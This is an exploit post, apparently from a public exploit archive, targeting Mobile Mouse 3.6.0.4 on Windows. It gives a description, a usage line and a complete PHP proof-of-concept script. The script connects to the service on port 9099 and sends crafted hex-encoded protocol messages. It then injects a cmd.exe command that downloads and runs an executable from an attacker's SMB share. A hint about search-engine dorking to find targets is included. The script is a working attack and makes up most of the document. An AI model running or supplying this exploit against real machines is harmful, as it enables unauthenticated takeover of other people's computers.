📄 Mobile Mouse 3.6.0.4 Remote Code Execution

=============================================================================================================================================
    | # Title     : Mobile Mouse 3.6.0.4 php Code Execution Vulnerability                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.mobilemouse.com/downloads/setup.exe                                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: a remote code execution (RCE) vulnerability affecting Mobile Mouse version 3.6.0.4 on Windows systems.
                          The flaw allows a remote attacker to execute arbitrary commands on a vulnerable machine by abusing the Mobile Mouse service listening on TCP port 9099. 
    					  By crafting specific protocol messages, an attacker can instruct the service to launch a system command that retrieves and executes a malicious payload from a remote SMB share.
    
    [+] The provided proof of concept (PoC) is written in PHP and demonstrates how an attacker can:
    
    Connect to a target running Mobile Mouse 3.6.0.4
    
    Interact with the Mobile Mouse protocol
    
    Trigger execution of a command that downloads and runs an external executable via a network share
    
    This exploit is described as a second version or refinement of an exploit originally disclosed in September 2022, with references to Packet Storm Security advisories. The PoC assumes the attacker has already set up an SMB share to host the payload.
    
    [+] Impact:
    
    Successful exploitation can result in full remote code execution with the privileges of the Mobile Mouse service, potentially leading to complete system compromise.
    
    [+] Affected platform:
    
    Windows (tested on Windows 10 Pro, French edition)
    
    [+] Risk level:
    
    High, due to unauthenticated remote exploitation on a network-exposed service.
    
       (Related : https://packetstorm.news/files/id/172071/ Related CVE numbers:   ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php --target=192.168.1.100 --file=payload.exe --lhost=192.168.1.50
    
    [+] PayLoad :
    
    <?php
    
    function smb_server($lhost, $file_to_serve) {
        echo "[+] SMB server functionality not implemented in PHP. You need to set up an SMB share manually.\n";
    }
    
    $help = "Mobile Mouse 3.6.0.4 Remote Code Execution";
    
    $options = getopt("", ["target:", "file:", "lhost::"]);
    
    if (!isset($options["target"]) || !isset($options["file"])) {
        die("Usage: php script.php --target=<Target IP> --file=<File to Upload> [--lhost=<Local IP>] \n");
    }
    
    $host = $options["target"];
    $command_shell = $options["file"];
    $lhost = isset($options["lhost"]) ? $options["lhost"] : "127.0.0.1";
    $port = 9099;
    
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($socket === false) {
        die("[-] Socket creation failed: " . socket_strerror(socket_last_error()) . "\n");
    }
    
    socket_set_option($socket, SOL_SOCKET, SO_SNDBUF, 256);
    
    if (!socket_connect($socket, $host, $port)) {
        die("[-] Connection failed: " . socket_strerror(socket_last_error()) . "\n");
    }
    
    echo "[+] Connected to $host on port $port\n";
    
    // Start SMB Server (Placeholder in PHP, should be done manually)
    smb_server($lhost, $command_shell);
    
    $CONN = hex2bin("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04");
    socket_send($socket, $CONN, strlen($CONN), 0);
    
    $run = socket_read($socket, 54);
    
    $RUN = hex2bin("4b45591e3131341e721e4f505404");
    socket_send($socket, $RUN, strlen($RUN), 0);
    
    $run = socket_read($socket, 54);
    
    sleep(1);
    
    $payload = "cmd.exe /c start /B \\\\" . $lhost . "\\share\\" . $command_shell;
    $hex_payload = bin2hex($payload);
    
    $SHELL = hex2bin("4B45591E3130301E" . $hex_payload . "1E04" . "4b45591e2d311e454e5445521e04");
    socket_send($socket, $SHELL, strlen($SHELL), 0);
    
    $shell = socket_read($socket, 96);
    
    echo "Take The rose...\n";
    
    sleep(30);
    
    socket_close($socket);
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================